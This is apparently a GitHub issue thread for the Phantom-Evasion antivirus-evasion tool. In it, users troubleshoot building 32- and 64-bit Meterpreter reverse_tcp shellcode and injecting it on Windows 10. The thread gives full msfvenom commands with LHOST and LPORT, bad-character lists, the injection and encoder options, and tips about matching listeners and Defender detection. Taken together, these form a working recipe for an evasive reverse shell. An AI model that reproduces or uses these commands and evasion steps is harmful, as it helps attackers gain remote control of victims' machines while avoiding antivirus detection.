Closed anonymouz4 closed 5 years ago
@anonymouz4 I will retest 32-bit shellcode from Veil and share the results tomorrow. Maybe it's not working just for you.
@usama7628674 I took the time to write this question as well as possible, so please also read it carefully. The question is about creating 64-bit shellcode, which is not possible with Veil.
@anonymouz4 Veil 32-bit shellcode is working fine. I got the session back in Meterpreter. I just generated the shellcode, used the x86 arch while compiling, and then ran it on my Windows 10 v1803, and I can confirm I got the session.
Msfvenom 32-bit shellcode is also working fine, and yes, it wasn't dying for me. Make sure Windows Defender is turned off.
The command I used while generating 32-bit shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d" > /root/Desktop/output
Msfvenom 64-bit shellcode is also working fine for me. The command that I used while generating 64-bit shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d/xf0" > /root/Desktop/outputs
All the tests were done with the Windows shellcode injection multipath HeapAlloc option (no. 4) and, for the encoder, option (4) as well.
All three options are working for me, but sadly all are detected by Windows Defender. I have to disable it while testing.
Make sure you set up a 32-bit listener if you're using 32-bit shellcode and a 64-bit listener if you're using 64-bit shellcode, because I made the mistake of setting up a 32-bit listener while I had generated 64-bit shellcode: the session did open, but it instantly closed.
Metasploit version that I used: 4.16.59-dev
@usama7628674 First, thanks for taking the time! Why did you also use "/xf0" as a badchar, or where did you get this info from? Just curious. And which OS are you using as the listener? I'm listening with msfconsole on macOS. Maybe the metasploit-framework doesn't work 100% on Mac.
@anonymouz4
Why did you also use "/xf0" as a badchar, or where did you get this info from?
I used it in the 64-bit shellcode because if I don't use it, the output shellcode has the bad characters \x00\x0d; that's why I use it. After using it, all the bad chars were gone from the shellcode.
And which OS are you using as the listener?
Kali Linux 2018.2, Metasploit version 4.16.59-dev
A lot of people have had issues with creating custom shellcode and using it.
What is the goal: Create 64-bit shellcode (reverse_tcp) and use it with Phantom-Evasion.
Previous tries:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0d" > outfile
(used windows/x64/meterpreter/reverse_tcp, of course with 64-bit in both listener and generator)
Question: Can anyone who got this working post a detailed list of the steps they did to achieve this? Something like:
(eg. Veil, msfvenom, etc.)
(eg. None, Xor, etc.)
(eg. HeapAlloc, VirtualAlloc, etc.)
Maybe @oddcod3 already tested this!